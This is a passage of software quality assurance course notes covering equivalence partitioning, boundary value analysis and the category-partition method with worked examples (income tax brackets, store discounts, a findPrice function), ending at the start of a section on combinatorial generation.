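The decision rule above can be sketched directly in Python; one logic-based test case is derived per combination of truth values of the two conditions (the function name is illustrative):

    def offer_travel_insurance(age: int, employed: bool) -> bool:
        # Decision rule from the text: AGE > 60 and EMPLOYED == NO.
        return age > 60 and not employed

    # One test case per truth-value combination of the two conditions.
    cases = [
        (65, False, True),   # both conditions hold: offer insurance
        (65, True,  False),  # employed, so no offer
        (40, False, False),  # not over 60, so no offer
        (40, True,  False),  # neither condition holds
    ]
    for age, employed, expected in cases:
        assert offer_travel_insurance(age, employed) == expected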

These are just some of the test design strategies used by testers to write effective test cases. They are often bundled together under the larger umbrella of quality management.


Test Generation

Requirements serve as the starting point for the generation of tests. During the initial phases of development, requirements may exist only in the minds of one or more people. These requirements, more aptly ideas, are then specified rigorously using modeling elements such as use cases, sequence diagrams, and state charts in UML. Rigorously specified requirements are often transformed into formal requirements using requirements specification languages such as Z, S, and RSML.

Any form of test generation uses a source document. In the most informal of test methods, the source document resides in the mind of the tester, who generates tests based on a knowledge of the requirements. In several commercial environments, the process is a bit more formal: the tests are generated using a mix of formal and informal methods, often directly from the requirements document serving as the source. In more advanced test processes, requirements serve as a source for the development of formal models.

Test generation strategies:

• Model based: require that a subset of the requirements be modeled using a formal notation (usually graphical). Models: finite state machines, timed automata, Petri nets, etc.
• Specification based: require that a subset of the requirements be modeled using a formal mathematical notation. Examples: B, Z, and Larch.
• Code based: generate tests directly from the code.


Test generation techniques


Equivalence partitioning

Equivalence Partitioning is also called equivalence class partitioning, abbreviated ECP. It is a software testing technique that divides the input data of the application under test into partitions of equivalent data from which test cases can be derived; each partition is exercised at least once.

An advantage of this approach is that it reduces the time required for testing, because fewer test cases are needed.

• Equivalence partitioning (EP) is a specification-based or black-box technique.
• It can be applied at any level of testing and is often a good technique to use first.
• The idea behind this technique is to divide (i.e., to partition) a set of test conditions into groups or sets that can be considered the same (i.e., the system should handle them equivalently), hence ‘equivalence partitioning’. Equivalence partitions are also known as equivalence classes; the two terms mean exactly the same thing.
• In the equivalence-partitioning technique we need to test only one condition from each partition. This is because we are assuming that all the conditions in one partition will be treated in the same way by the software. If one condition in a partition works, we assume all of the conditions in that partition will work, and so there is little point in testing any of the others. Similarly, if one of the conditions in a partition does not work, then we assume that none of the conditions in that partition will work, so again there is little point in testing any more in that partition.

Equivalence Partitioning = Equivalence Class Partitioning = ECP

• Valid Input Class = keeps all valid inputs.
• Invalid Input Class = keeps all invalid inputs.


Example :

The example below best describes equivalence class partitioning:

Assume that the application accepts an integer in the range 100 to 999.
Valid equivalence class partition: 100 to 999 inclusive.
Invalid equivalence class partitions: less than 100, more than 999, decimal numbers, and alphabets/non-numeric characters.

For example, a savings account in a bank earns a different rate of interest depending on the balance in the account. In order to test the software that calculates the interest due, we can identify the ranges of balance values that earn the different rates of interest. For example, a 3% rate of interest is given if the balance in the account is in the range of $0 to $100, a 5% rate of interest is given if the balance is in the range of $100 to $1000, and a 7% rate of interest is given if the balance is $1000 and above. We would initially identify three valid equivalence partitions and one invalid partition:

Invalid partition: balance below $0
Valid partition (3% interest): $0 to $100
Valid partition (5% interest): $100 to $1000
Valid partition (7% interest): $1000 and above

In this example we have identified four partitions, even though the specification mentioned only three. This shows a very important task of the tester: a tester should not only test what is in the specification, but should also think about things that haven’t been specified. In this case we have thought of the situation where the balance is less than zero. When designing the test cases for this software we would ensure that all three valid equivalence partitions are covered once, and we would also test the invalid partition at least once. So, for example, we might choose to calculate the interest on balances of -$10.00, $50.00, $260.00, and $1348.00. Note that when we say a partition is ‘invalid’, it doesn’t mean that it represents a value that cannot be entered by a user or a value that the user isn’t supposed to enter. It just means that it is not one of the expected inputs for this particular field.
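A minimal Python sketch of this example follows. The boundary ownership at $100 and $1000 (which the specification leaves ambiguous) and the function name are assumptions for illustration; the four test balances are the ones chosen above:

    def interest_rate(balance: float) -> float:
        if balance < 0:
            raise ValueError("invalid balance")  # the invalid partition
        if balance < 100:                        # assumed half-open: [0, 100)
            return 0.03
        if balance < 1000:                       # assumed half-open: [100, 1000)
            return 0.05
        return 0.07                              # $1000 and above

    # One representative value per partition, as chosen in the text.
    for balance in (-10.00, 50.00, 260.00, 1348.00):
        try:
            print(balance, "->", interest_rate(balance))
        except ValueError as err:
            print(balance, "->", err)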

Example 2

A store in the city offers different discounts depending on the purchases made by the individual. In order to test the software that calculates the discounts, we can identify the ranges of purchase values that earn the different discounts: a purchase in the range of $1 up to $50 has no discount, a purchase over $50 and up to $200 has a 5% discount, purchases of $201 up to $500 have a 10% discount, and purchases of $501 and above have a 15% discount.

Now we can identify four valid equivalence partitions and one invalid partition:

Invalid partition: below $1
Valid partition (no discount): $1 up to $50
Valid partition (5% discount): over $50 up to $200
Valid partition (10% discount): $201 up to $500
Valid partition (15% discount): $501 and above

Equivalence Partitioning Process:

In this method the input domain data is divided into different equivalence data classes. This method is typically used to reduce the total number of test cases to a finite set of testable test cases, still covering maximum requirements.

In short it is the process of taking all possible test cases and placing them into classes. One test value is picked from each class while testing.

E.g.: If you are testing an input box accepting numbers from 1 to 1000, then there is no use in writing a thousand test cases for all 1000 valid input numbers plus other test cases for invalid data.

Using the equivalence partitioning method, the test cases can be divided into three sets of input data, called classes. Each test case is a representative of its class.

So in the above example we can divide our test cases into three equivalence classes of some valid and invalid inputs.

Test cases for an input box accepting numbers between 1 and 1000 using equivalence partitioning:

1) One input data class with all valid inputs. Pick a single value from the range 1 to 1000 as a valid test case. If you select other values between 1 and 1000, the result is going to be the same, so one test case for valid input data should be sufficient.

2) An input data class with all values below the lower limit, i.e., any value below 1, as an invalid input data test case.

3) Input data with any value greater than 1000, to represent the third, invalid, input class.

So using equivalence partitioning you have categorized all possible test cases into three classes. Test cases with other values from any class should give you the same result.

We have selected one representative from every input class to design our test cases. Test case values are selected in such a way that the largest number of attributes of the equivalence class can be exercised.
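The three classes can be captured in a short sketch; the helper below simply returns one representative value per partition (the choice of the midpoint for the valid class is arbitrary, since, as noted above, any in-range value would do):

    def representatives(lo: int = 1, hi: int = 1000) -> dict:
        """One test value per equivalence class for a field accepting lo..hi."""
        return {
            "valid (lo..hi)":     (lo + hi) // 2,   # any value in range behaves the same
            "invalid (below lo)": lo - 1,
            "invalid (above hi)": hi + 1,
        }

    print(representatives())
    # {'valid (lo..hi)': 500, 'invalid (below lo)': 0, 'invalid (above hi)': 1001}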

Page 213: CP 7026 - Software Quality Assurance

Equivalence partitioning uses the fewest test cases to cover the maximum number of requirements.

Equivalence partitioning is a method to derive positive and negative test cases. Classes of input conditions, called ‘equivalence classes’, are identified such that each member of the class causes the same kind of processing and output to occur.

When to use the technique: when we generate test cases for primary flows and field-level validations. We identify the sets of cases that generate similar output for a range of inputs, and we have separate test cases for positive and negative validations.


EQUIVALENCE CLASS PARTITIONING

An input domain may be too large for all its elements to be used as test input (Figure 9.8a). However, the input domain can be partitioned into a finite number of subdomains for selecting test inputs. Each subdomain is known as an equivalence class (EC), and it serves as a source of at least one test input (Figure 9.8b). The objective of equivalence partitioning is to divide the input domain of the system under test into classes, or groups, of inputs. All the inputs in the same class have a similar effect on the system under test [14, 15]. An EC is a set of inputs that the system treats identically when the system is tested. It represents certain conditions, or predicates, on the input domain. An input condition on the input domain is a predicate over the values of the input domain. A valid input to a system is an element of the input domain that is expected to return a nonerror value. An invalid input is an input that is expected to return an error value. Input conditions are used to partition the input domain into ECs for the purpose of selecting inputs.

[Figure 9.8: (a) Too many test inputs; (b) one input selected from each subdomain.]

Guidelines for EC Partitioning

Equivalence classes can be derived from an input domain by a heuristic technique. One can approximate the ECs by identifying classes for which different program behaviors are specified. Identification of ECs becomes easier with experience. Myers suggests the following guidelines to identify ECs [16].

1. An input condition specifies a range [a, b]: Identify one EC for a ≤ X ≤ b and two other classes for X < a and X > b to test the system with invalid inputs.

2. An input condition specifies a set of values: Create one EC for each element of the set and one EC for an invalid member. For example, if the input is selected from a set of N items, then N + 1 ECs are created: (i) one EC for each element of the set {M1}, {M2}, . . . , {MN} and (ii) one EC for elements outside the set {M1, M2, . . . , MN}.

3. An input condition specifies each individual value: If the system handles each valid input differently, then create one EC for each valid input. For example, if the input is from a menu, then create one EC for each menu item.

4. An input condition specifies the number of valid values (say N): Create one EC for the correct number of inputs and two ECs for invalid inputs: one for zero values and one for more than N values. For example, if a program can accept 100 natural numbers for sorting, then three ECs are created: (i) one for 100 valid input natural numbers, (ii) one for no input value, and (iii) one for more than 100 natural numbers.

5. An input condition specifies a “must-be” value: Create one EC for the must-be value and one EC for something that is not a must-be value. For example, if the first character of a password must be a numeric character, then we are required to generate two ECs: (i) one for valid values, {pswd | the first character of pswd has a numeric value}, and (ii) one for invalid values, {pswd | the first character of pswd is not numeric}.

6. Splitting of an EC: If elements in a partitioned EC are handled differently by the system, then split the EC into smaller ECs.

Identification of Test Cases from ECs

Having identified the ECs of an input domain of a program, test cases for each EC can be identified by the following steps:

Step 1: Assign a unique number to each EC.

Step 2: For each EC with valid input that has not been covered by test cases yet, write a new test case covering as many uncovered ECs as possible.

Step 3: For each EC with invalid input that has not been covered by test cases, write a new test case that covers one and only one of the uncovered ECs.

In summary, the advantages of EC partitioning are as follows:

• A small number of test cases are needed to adequately cover a large input domain.
• One gets a better idea about the input domain being covered with the selected test cases.
• The probability of uncovering defects with the selected test cases based on EC partitioning is higher than that with a randomly chosen test suite of the same size.
• The EC partitioning approach is not restricted to input conditions alone; the technique may also be used for output domains.

Example: Adjusted Gross Income. Consider a software system that computes income tax based on adjusted gross income (AGI) according to the following rules:

If AGI is between $1 and $29,500, the tax due is 22% of AGI.
If AGI is between $29,501 and $58,500, the tax due is 27% of AGI.
If AGI is between $58,501 and $100 billion, the tax due is 36% of AGI.


TABLE 9.10 Generated Test Cases to Cover Each Equivalence Class

Test Case Number   Test Value     Expected Result                   Equivalence Class Being Tested
TC1                $22,000        $4,840                            EC1
TC2                $46,000        $12,420                           EC3
TC3                $68,000        $24,480                           EC4
TC4                $-20,000       Rejected with an error message    EC2
TC5                $150 billion   Rejected with an error message    EC5

In this case, the input domain is from $1 to $100 billion. There are three input conditions in the example:

1. $1 ≤ AGI ≤ $29,500.
2. $29,501 ≤ AGI ≤ $58,500.
3. $58,501 ≤ AGI ≤ $100 billion.

First we consider condition 1, namely, $1 ≤ AGI ≤ $29,500, to derive two ECs:

EC1: $1 ≤ AGI ≤ $29,500; valid input.
EC2: AGI < $1; invalid input.

Then, we consider condition 2, namely, $29,501 ≤ AGI ≤ $58,500, to derive one EC:

EC3: $29,501 ≤ AGI ≤ $58,500; valid input.

Finally, we consider condition 3, namely, $58,501 ≤ AGI ≤ $100 billion, to derive two ECs:

EC4: $58,501 ≤ AGI ≤ $100 billion; valid input.
EC5: AGI > $100 billion; invalid input.

Note that each condition was considered separately in the derivation of ECs. Conditions are not combined to select ECs. Five test cases are generated to cover the five ECs, as shown in Table 9.10.
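A sketch of the rules and the five test cases of Table 9.10 in Python (the function name and error handling via exceptions are illustrative assumptions):

    def tax_due(agi: float) -> float:
        if agi < 1:
            raise ValueError("rejected with an error message")  # EC2
        if agi <= 29_500:
            return 0.22 * agi                                   # EC1
        if agi <= 58_500:
            return 0.27 * agi                                   # EC3
        if agi <= 100e9:
            return 0.36 * agi                                   # EC4
        raise ValueError("rejected with an error message")      # EC5

    # The five test cases of Table 9.10, one per equivalence class.
    assert round(tax_due(22_000), 2) == 4_840.00    # TC1 covers EC1
    assert round(tax_due(46_000), 2) == 12_420.00   # TC2 covers EC3
    assert round(tax_due(68_000), 2) == 24_480.00   # TC3 covers EC4
    for invalid in (-20_000, 150e9):                # TC4 covers EC2, TC5 covers EC5
        try:
            tax_due(invalid)
        except ValueError:
            pass  # rejected, as expected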

In the EC partition technique, a single test input is arbitrarily selected to cover a specific EC. We need to generate specific test inputs by considering the extremes, either inside or outside of the defined EC partitions. This leads us to the next technique, known as boundary value analysis, which focuses on the boundaries of the ECs to identify test inputs.


Boundary value analysis

What is a Boundary Value

A boundary value is any input or output value on the edge of an equivalence partition.

Let us take an example to explain this:

Suppose you have software that accepts values between 1 and 1000. The valid partition will be 1-1000, and the equivalence partitions will be: below 1 (invalid), 1 to 1000 (valid), and above 1000 (invalid). The boundary values will be 1 and 1000 from the valid partition, and 0 and 1001 from the invalid partitions.

Boundary Value Analysis is a black-box test design technique in which test cases are designed using boundary values; BVA is used in range checking.

What is Boundary Testing?

Boundary value analysis is a type of black box or specification based testing technique in which tests are performed using the boundary values.

Example:

An exam has a pass boundary at 50 percent, merit at 75 percent and distinction at 85 percent. The Valid Boundary values for this scenario will be as follows:


49, 50 - for pass
74, 75 - for merit
84, 85 - for distinction

Boundary values are validated against both the valid boundaries and invalid boundaries.

The Invalid Boundary Cases for the above example can be given as follows:

0 - for the lower limit boundary value
101 - for the upper limit boundary value

Example 2:

A store in the city offers different discounts depending on the purchases made by the individual. In order to test the software that calculates the discounts, we can identify the ranges of purchase values that earn the different discounts: a purchase in the range of $1 up to $50 has no discount, a purchase over $50 and up to $200 has a 5% discount, purchases of $201 up to $500 have a 10% discount, and purchases of $501 and above have a 15% discount.

As before, we can identify four valid equivalence partitions and one invalid partition. From these partitions we can identify the boundary values of each partition. We assume that two decimal digits are allowed.

Boundary values for the invalid partition: 0.00
Boundary values for the valid partition (no discount): 1, 50
Boundary values for the valid partition (5% discount): 51, 200
Boundary values for the valid partition (10% discount): 201, 500
Boundary values for the valid partition (15% discount): 501, the maximum number allowed in the software application

• Boundary value analysis (BVA) is based on testing at the boundaries between partitions.

• Here we have both valid boundaries (in the valid partitions) and invalid boundaries (in the invalid partitions).

• As an example, consider a printer that has an input option for the number of copies to be made, from 1 to 99. To apply boundary value analysis, we take the minimum and maximum (boundary) values from the valid partition (1 and 99 in this case) together with the first value beyond each boundary in the adjacent invalid partitions (0 and 100 in this case). In this example we would have three equivalence partitioning tests (one from each of the three partitions) and four boundary value tests. The same analysis can be applied to the bank system described in the equivalence partitioning section above.

Boundary value analysis is a test case design technique to test the boundary values between partitions (both valid and invalid boundary partitions). A boundary value is an input or output value on the border of an equivalence partition; this includes the minimum and maximum values at the inside and outside boundaries. Normally, boundary value analysis is part of stress and negative testing.

Using the boundary value analysis technique, the tester creates test cases for a required input field. For example, consider an Address text box that allows a maximum of 500 characters. Writing a test case for every possible character count would be impractical, so boundary value analysis is chosen.

Example 1

Suppose you have a very important tool at the office that requires a valid User Name and Password to work, and it accepts a minimum of 8 characters and a maximum of 12 characters. Valid range: 8-12 characters. Invalid ranges: 7 or fewer characters, and 13 or more characters.

Write test cases for valid partition values, invalid partition values, and exact boundary values.

• Test Case 1: Consider a password of length less than 8.
• Test Case 2: Consider a password of length exactly 8.
• Test Case 3: Consider a password of length between 9 and 11.
• Test Case 4: Consider a password of length exactly 12.
• Test Case 5: Consider a password of length more than 12.
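A small sketch that enumerates these boundary lengths and checks each against the 8-12 rule (the helper and its defaults are assumptions for illustration):

    def boundary_lengths(min_len: int = 8, max_len: int = 12) -> list:
        """Each boundary plus the first value just beyond it."""
        return [min_len - 1, min_len, min_len + 1,
                max_len - 1, max_len, max_len + 1]

    for n in boundary_lengths():
        password = "x" * n
        verdict = "accept" if 8 <= len(password) <= 12 else "reject"
        print(f"length {n:2d} -> {verdict}")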

Advantages:

a) Very good at exposing potential user interface/user input problems

b) Very clear guidelines on determining test cases

c) Very small set of test cases generated

Disadvantages:

a) Does not test all possible inputs

b) Does not test dependencies between combinations of inputs

BOUNDARY VALUE ANALYSIS

The central idea in boundary value analysis (BVA) is to select test data near the boundary of a data domain so that data both within and outside an EC are selected.


It produces test inputs near the boundaries to find failures caused by incorrect implementation of the boundaries. Boundary conditions are predicates that apply directly on and around the boundaries of input ECs and output ECs. In practice, designers and programmers tend to overlook boundary conditions. Consequently, defects tend to be concentrated near the boundaries between ECs. Therefore, test data are selected on or near a boundary. In that sense, the BVA technique is an extension and refinement of the EC partitioning technique [17]. In the BVA technique, the boundary conditions for each EC are analyzed in order to generate test cases.

Guidelines for BVA

As in the case of EC partitioning, the ability to develop high-quality, effective test cases using BVA requires experience. The guidelines discussed below are applicable to both input conditions and output conditions, and are useful in identifying high-quality test cases. By high-quality test cases we mean test cases that can reveal defects in a program.

1. The EC specifies a range: If an EC specifies a range of values, then construct test cases by considering the boundary points of the range and points just beyond the boundaries of the range. For example, let an EC specify the range −10.0 ≤ X ≤ 10.0. This would result in test data {−9.9, −10.0, −10.1} and {9.9, 10.0, 10.1}.

2. The EC specifies a number of values: If an EC specifies a number of values, then construct test cases for the minimum and the maximum value of the number. In addition, select a value smaller than the minimum and a value larger than the maximum. For example, let the EC specification of a student dormitory state that a housing unit can be shared by one to four students; test cases that include 1, 4, 0, and 5 students would be developed.

3. The EC specifies an ordered set: If the EC specifies an ordered set, such as a linear list, table, or sequential file, then focus attention on the first and last elements of the set.

Example: Let us consider the five ECs identified in our previous example to compute income tax based on AGI. The BVA technique results in test data as follows for each EC. The redundant data points may be eliminated.

EC1: $1 ≤ AGI ≤ $29,500. This would result in values of $1, $0, $–1, $1.50 and $29,499.50, $29,500, $29,500.50.

EC2: AGI < $1. This would result in values of $1, $0, $–1, $–100 billion.

EC3: $29,501 ≤ AGI ≤ $58,500. This would result in values of $29,500, $29,500.50, $29,501, $58,499, $58,500, $58,500.50, $58,501.

EC4: $58,501 ≤ AGI ≤ $100 billion. This would result in values of $58,500, $58,500.50, $58,501, $100 billion, $101 billion.

EC5: AGI > $100 billion. This would result in $100 billion, $101 billion, $10,000 billion.

Remark. Should we test for an AGI value of $29,500.50 (i.e., between the partitions), and if so, what should be the result? Since we have not been told whether the decimal values are actually possible, the best decision is to test for this value and report the result.
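Guideline 1 can be sketched as a small helper that, for each range EC, emits the boundary points together with the values just inside and just beyond them. The uniform $0.50 step is a simplifying assumption; the text mixes $1 and $0.50 steps around the lowest boundary:

    def range_boundary_values(lo: float, hi: float, step: float = 0.50) -> list:
        """Boundary test data for an EC that specifies the range lo..hi."""
        return sorted({lo - step, lo, lo + step, hi - step, hi, hi + step})

    # Boundary test data for the three valid AGI partitions.
    print(range_boundary_values(1, 29_500))
    print(range_boundary_values(29_501, 58_500))
    print(range_boundary_values(58_501, 100e9))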


Category partition method


The Category Partition Method is a systematic approach to the generation of tests from requirements. The method consists of a mix of manual and automated steps. A method for creating functional test suites has been developed in which a test engineer analyzes the system specification, writes a series of formal test specifications, and then uses a generator tool to produce test descriptions from which test scripts are written.


The advantages of this method are that the tester can easily modify the test specification when necessary, and can control the complexity and number of the tests by annotating the test specification with constraints.

It is a systematic, specification-based method that uses partitioning to generate functional tests for complex software systems.

The method includes the use of formal test specifications and is supported by a generator tool that produces test case descriptions from test specifications.

The method goes through a series of decompositions, starting with the original functional specification and continuing through the individual details of each subprogram being tested.

The Category Partition Method (CPM) is a systematic, specification-based methodology that uses an informal functional specification to produce a formal test specification.

The test designer’s key job is to develop categories, which are defined to be the major characteristics of the input domain of the function under test. Each category is partitioned into equivalence classes of inputs called choices. The choices in each category must be disjoint, and together the choices in each category must cover the input domain.

The main characteristics of the category-partition method include the following:

A. The test specification is a concise and uniform representation of the test information for a function.

B. The test specification can be easily modified if this is necessitated by changes in the functional specification of a command, mistakes in an original test specification, or a desire for more or fewer test cases.

C. The test specification gives the tester a logical way to control the volume of tests.

D. The generator tool provides an automated way to produce thorough tests for each function, and to avoid impossible or undesirable combinations of parameters and environments.

E. The method emphasizes both the specification coverage and the error detection aspects of testing.

Page 251: CP 7026 - Software Quality Assurance

It helps software testers create test cases by refining the functional specification of a program into test specifications. It identifies the elements that influence the functions of the program and generates test cases by methodically varying these elements over all values of interest.

The method consists of the following steps:

1. Decompose the functional specification into functional units that can be tested independently.

2. Identify the parameters (the explicit inputs to a functional unit) and environment conditions (the state of the system at the time of execution) that affect the execution behavior of the function.

3. Find categories (major properties or characteristics) of information that characterize each parameter and environment condition.

4. Partition each category into choices, which include all the different kinds of values that are possible for that category.

5. Determine the constraints among the choices of different categories. For example, one choice may require that another is absent, or has a particular value.

6. Write the test specification (which is a list of categories, choices, and constraints in a predefined format) using the test specification language TSL.

7. Use a generator to produce test frames from the test specification. Each generated test frame is a set of choices such that each category contributes no more than one choice.

8. For each generated test frame, create a test case by selecting a single element from each choice in that test frame.

Decompose the functional specification into functional units

Method for creating test suites
– Role of the test engineer
  • Analyze the system specification
  • Write a series of formal test specifications
– Automatic generator
  • Produces test frames


– Characteristics of functional units
  • They can be tested independently
  • Examples
    – A top-level user command
    – Or a function
  • Decomposition may require several stages
  • Similar to the high-level decomposition done by software designers
    – May be reused, although independent decomposition is recommended

Examine each functional unit
– Identify parameters
  • Explicit input to the functional unit
– Environmental conditions
  • Characteristics of the system’s state

Test Cases
– Specific values of parameters
– And environmental conditions

“Test cases are chosen to maximize chances of finding errors.”

• For each parameter and environmental condition
  – Find categories
    • Major property or characteristic
    • Examples: browsers, operating systems, array size
• For each category
  – Find choices
    • Examples: (IE 5.0, IE 4.5, Netscape 7.0), (Windows NT, Linux), (100, 0, -1)

Develop a “Formal Test Specification” for each functional unit
– List of categories
– Lists of choices within each category
– Constraints

• The generator automatically produces a set of “test frames”
  – Each test frame consists of a set of choices

Steps in the generation of tests using the category-partition method:

[Figure: test generation flow. Activities: analyze specification, identify categories, partition categories, identify constraints, process specification, evaluate generator output (rewriting the test specification if necessary), and generate test scripts. Artifacts: functional specification, functional units, categories, choices, constraints, test specification, test frames, test scripts.]

Page 254: CP 7026 - Software Quality Assurance

A tester transforms requirements into test specifications. These test specifications consist of categories corresponding to program inputs and environment objects. Each category is partitioned into choices that correspond to one or more values for the input or the state of an environment object. Test specifications also contain constraints on the choices so that only reasonable and valid sets of tests are generated.

Test specifications are input to a test-frame generator that produces a number of test frames from which test scripts are generated. A test frame is a collection of choices, one corresponding to each category. A test frame serves as a template for one or more test cases that are combined into one or more test scripts.

(Summary) The method comprises the following steps:

Step 1. Analyze the Specification
Step 2. Identify Categories
Step 3. Partition the Categories into Choices
Step 4. Determine Constraints among Choices
Step 5. Formalize and Evaluate the Test Specification
Step 6. Generate and Validate the Test Cases

Analyze the specification. The tester identifies individual functional units that can be separately tested. For each unit, the tester identifies:

1. parameters of the functional unit;
2. characteristics of each parameter;
3. objects in the environment whose state could affect the functional unit’s operation;
4. characteristics of each environment object.

The tester then classifies these items into categories that have an effect on the behavior of the functional unit.

Partition the categories into choices. The tester determines the different significant cases that can occur within each parameter/environment category.

Determine constraints among the choices. The tester decides how the choices interact, how the occurrence of one choice can affect the existence of another, and what special restrictions might affect any choice.

Write and process the test specification. The category, choice, and constraint information is written in a formal test specification. The written specification is then processed by a generator that produces a set of test frames for the functional unit.

Evaluate the generator output. The tester examines the test frames produced by the generator and determines whether any changes to the test specification are necessary. Reasons for changing the test specification include the absence of some obviously necessary test situation, the appearance of impossible test combinations, or a judgment that too many test cases have been produced. If the specification must be changed, the write-and-process step is repeated.

Transform into test scripts. When the test specification is stable, the tester converts the test frames produced by the tool into test cases and organizes the test cases into test scripts.

Example: findPrice

Syntax: fP(code, quantity, weight)

Function: findPrice takes three inputs: code, qty, and weight. The item code is represented by a string of eight digits contained in the variable code. The quantity purchased is contained in qty. The weight of the item purchased is contained in weight.

Function fP accesses a database to find and display the unit price, the description, and the total price of the item corresponding to code.

fP is required to display an error message, and return, if any of the three inputs is incorrect.

The leftmost digit of the code decides how the values of qty and weight are to be used. code is an eight-digit string that denotes the product type. fP is concerned with only the leftmost digit, which is interpreted as follows:


Leftmost digit   Interpretation
0                Ordinary grocery items such as bread, magazines, and soup.
2                Variable-weight items such as meats, fruits, and vegetables.
3                Health-related items such as band-aids, Dettol, and cotton.
5                Coupon; digit 2 (dollars) and digits 3 and 4 (cents) specify the discount.
1, 6-9           Unused.

The use of parameters qty and weight depends on the leftmost digit in code.

qty indicates the quantity purchased, an integer, when the leftmost digit is 0 or 3; weight is ignored.

weight is the weight of the item purchased when the leftmost digit is 2; qty is ignored.

qty is the value of the discount when the leftmost digit is 5; again, weight is ignored. When the leftmost digit is 5, the second digit from the left specifies the dollar amount and the third and fourth digits specify the cents.

Steps used in the Category-Partition Method

Step 1: Analyze specification

In this step, the tester identifies each functional unit that can be tested separately.

For large systems, a functional unit may correspond to a subsystem that can be tested independently.

The subsystem can be further subdivided leading to independently testable subunits.

The subdivision process terminates depending on what is to be tested.

In this example, we assume that fP is an independently testable subunit of an application.

Thus we will derive tests for fP.

Step 2: Identify Categories


For each testable unit, the given specification is analyzed and the inputs isolated.

In addition, the objects in the environment, for example files, also need to be identified.

Next, the characteristics of each parameter and environment object are determined.

A characteristic is referred to as a Category.

Some characteristics are stated explicitly; others might need to be derived by a careful examination of the specification.

fP has three input parameters: code, qty, and weight. The specification mentions various characteristics of these parameters, such as their type and interpretation. qty and weight are related to code.

The database accessed by fP is an environment object.

code: length, leftmost digit, remaining digits

qty: integer

weight: float

database: contents

Step 3: Partition Categories

For each category, the tester determines different cases against which the functional unit

must be tested.

Each case is also referred to as a choice.

It is useful to partition each category into at least two subsets, a set containing correct

values and another consisting of erroneous values.

code:

length

Valid (eight digits)

Invalid (less than or greater than eight digits)

leftmost digit

0

2

3

5


others

remaining digits

valid string

invalid string (e.g., 0X5987Y)

qty:

integer

valid quantity

invalid quantity (e.g., 0)

weight:

float

valid weight

invalid weight (e.g., 0)

Environments:

database:

contents

item exists

item does not exist

Step 4: Identify Constraints

A test for a functional unit consists of a combination of choices for each parameter and

environment object.

Certain combinations might not be possible while others must satisfy specific

relationships.

Constraints among choices are specified in this step.

A constraint is specified using a property list and a selector expression.

A property list has the following form:

[property P1, P2, ...]

where property is a keyword and P1, P2, etc. are the names of individual properties.

Each choice can be assigned a property.

A selector expression is a conjunction of pre-defined properties specified in some

property list.

A selector expression takes one of the forms:

[if P]

[if P1 and P2 and ...]

Either of these forms can be suffixed to any choice.


A special property written [error] can be assigned to choices that represent error

conditions.

Another special property, [single], allows the tester to specify that the associated choice is not to be combined with choices of other parameters or environment objects while generating test frames in Step 6.

# Leftmost digit of code

0 [property ordinary-grocery]

2 [property variable-weight]

# Remaining digits of the code

valid string [single]

# Valid value of qty

valid quantity [if ordinary-grocery]

# Incorrect value of qty

invalid quantity [error]

Step 5: (Re) Write Test specification (TSL)

code:

length

Valid

Invalid [error]

leftmost digit

0 [property ordinary-grocery]

2 [property variable-weight]

3 [property Health-related]

5 [property Coupon]

remaining digits

Valid string

Invalid string [error]

qty:

Valid quantity

Invalid quantity [error]

weight:


Valid weight [if variable-weight]

Invalid weight [error]

Environments:

database:

contents

item exists

item does not exist [error]

Step 6: Process specification

Processing the test specification produces a set of test frames; one of the generated frames is shown below.

Test case 2: (key = 1.2.1.0.1.1)

Length: valid

Leftmost digit: 2

Remaining digits: valid

qty: ignored

weight: 3.19

database: item exists

Step 7: Evaluate generator output

Step 8: Generate Test scripts

A test script is a group of test cases.
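To make the frame-generation step concrete, here is a minimal Python sketch (our own illustration, not the actual TSL generator) that enumerates test frames from categories, choices, and one constraint. The category names follow the fP example; the constraint encoding is an assumption made for illustration, and real TSL processing would also honor the [error] and [single] annotations, which this sketch omits for brevity.

# Minimal category-partition frame generator (illustrative sketch, not the TSL tool).
from itertools import product

# Each category maps to its choices.
categories = {
    "length":    ["valid", "invalid"],
    "leftmost":  ["0", "2", "3", "5"],
    "remaining": ["valid string", "invalid string"],
    "qty":       ["valid quantity", "invalid quantity"],
    "weight":    ["valid weight", "invalid weight"],
    "database":  ["item exists", "item does not exist"],
}

# Assumed constraint: "valid weight" only makes sense for variable-weight items (leftmost digit 2).
def satisfies_constraints(frame):
    if frame["weight"] == "valid weight" and frame["leftmost"] != "2":
        return False
    return True

names = list(categories)
frames = [dict(zip(names, combo))
          for combo in product(*categories.values())
          if satisfies_constraints(dict(zip(names, combo)))]
print(len(frames), "test frames generated")
print(frames[0])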

Limitations

• Does not find performance or stress-related defects

• The size of the test suite can become large

• Subjectivity is reduced but still persists in identifying categories and choices


Combinatorial generation

The goal of combinatorial generation is to exhaustively produce a set of combinatorial objects, one at a time, often subject to some constraints, and often in a certain required order.

Combinatorial generation problems encompass a wide range of problems, from relatively simple (e.g. generating all subsets or all permutations) to rather complex (e.g. generating all ideals of a poset in Gray order).

Algorithms for combinatorial generation are often divided into iterative and recursive categories. Iterative algorithms have traditionally been considered superior in performance due to the overhead of repetitive function calls in recursive algorithms. Arguably, this advantage is less noticeable when recursion is used properly (no redundant subtrees in the recursion tree) and modern compilers are used. Recursive algorithms, on the other hand, often have the advantage of being easier to read and understand.

These two types of algorithms can be further considered as ways of approaching a combinatorial generation problem. That is, there are a few problem-solving strategies that work naturally with each type of algorithm. For example, with recursion, the main strategy involves reducing the problem to a subproblem. Similarly, with iterative algorithms the strategy of finding the next object in lexicographic order is quite commonly used and is rather powerful. Approaches that use the algebraic or arithmetic properties of the objects generated are also often used in iterative algorithms. We will see some examples of all of these in this article.

Coroutines, which can be seen as a generalization of functions, can encompass both recursive and iterative algorithms. As such, they provide an ideal mechanism for combinatorial generation. In fact, one of the most popular coroutine use patterns in modern programming languages is the generator pattern, which we will discuss in the next section. As the name suggests, generators provide the perfect mechanism for implementing combinatorial generation algorithms, recursive or iterative.

In addition, since coroutines are a generalization of functions, we can exploit their generality to come up with combinatorial generation algorithms that are arguably somewhere between recursive and iterative. These algorithms introduce a new strategy for approaching combinatorial generation, which can be taken as a third approach, in addition to recursive and iterative approaches.
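As a small illustration of the generator pattern applied to combinatorial generation, the following Python sketch (our own example) yields all subsets of a list recursively, one at a time, rather than building the whole list in memory.

# Recursive generator yielding all subsets of items, one at a time.
def subsets(items):
    if not items:
        yield []
        return
    first, rest = items[0], items[1:]
    for s in subsets(rest):
        yield s            # subsets that exclude the first element
        yield [first] + s  # subsets that include the first element

for s in subsets([1, 2, 3]):
    print(s)               # prints all 8 subsets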


What is Combinatorial Generation?

